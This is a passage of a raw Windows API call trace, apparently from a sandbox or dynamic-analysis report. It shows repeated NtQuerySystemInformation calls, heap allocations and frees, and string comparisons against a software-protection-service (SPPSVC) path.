ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x28, ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0230.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0230.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0230.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x28, ResultLength=0x0) [0230.573] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x28, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0230.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0230.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x20, ResultLength=0x0) [0230.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x20, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x28, ResultLength=0x0) [0230.589] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x50, ResultLength=0x0) [0230.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feed0, Length=0x28, ResultLength=0x0) [0230.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0230.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x28, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x20, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff030, Length=0x38, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x20, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0230.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.604] GetProcessHeap () returned 0x27fc8db0000 [0230.604] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efa590 [0230.604] GetProcessHeap () returned 0x27fc8db0000 [0230.604] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f810 [0230.870] GetProcessHeap () returned 0x27fc8db0000 [0230.871] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xfe) returned 0x27fc8e0c860 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x108) returned 0x27fc8e0d740 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8faa0 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x110) returned 0x27fc8e45a30 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb090 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f820 [0230.872] GetProcessHeap () returned 0x27fc8db0000 [0230.872] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc992d900 | out: hHeap=0x27fc8db0000) returned 1 [0230.873] GetProcessHeap () returned 0x27fc8db0000 [0230.873] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1c4) returned 0x27fc8e29e90 [0230.873] GetProcessHeap () returned 0x27fc8db0000 [0230.873] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xfc) returned 0x27fc8e0da70 [0230.873] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a67ff288 | out: phModule=0xf7a67ff288*=0x7ffcea380000) returned 1 [0230.873] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0230.874] GetProcessHeap () returned 0x27fc8db0000 [0230.874] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8f620 [0230.874] GetProcessHeap () returned 0x27fc8db0000 [0230.874] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x48) returned 0x27fc9e88150 [0230.874] GetProcessHeap () returned 0x27fc8db0000 [0230.874] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efc320 [0230.874] GetProcessHeap () returned 0x27fc8db0000 [0230.874] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e4f7f0 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x34) returned 0x27fc9f8f520 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0d740 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e45a30 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb090 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f820 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8faa0 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e29e90 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0da70 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e88150 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efc320 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f7f0 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8f620 | out: hHeap=0x27fc8db0000) returned 1 [0230.875] GetProcessHeap () returned 0x27fc8db0000 [0230.875] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87700 | out: hHeap=0x27fc8db0000) returned 1 [0230.876] GetProcessHeap () returned 0x27fc8db0000 [0230.876] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0c860 | out: hHeap=0x27fc8db0000) returned 1 [0230.876] GetProcessHeap () returned 0x27fc8db0000 [0230.876] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8f520 | out: hHeap=0x27fc8db0000) returned 1 [0230.876] GetProcessHeap () returned 0x27fc8db0000 [0230.876] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efa590 | out: hHeap=0x27fc8db0000) returned 1 [0230.876] GetProcessHeap () returned 0x27fc8db0000 [0230.876] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e4f810 | out: hHeap=0x27fc8db0000) returned 1 [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff420, Length=0x20, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff250, Length=0x50, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x28, ResultLength=0x0) [0230.877] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff250, Length=0x50, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff250, Length=0x50, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff250, Length=0x50, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x38, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefb0, Length=0x28, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefb0, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 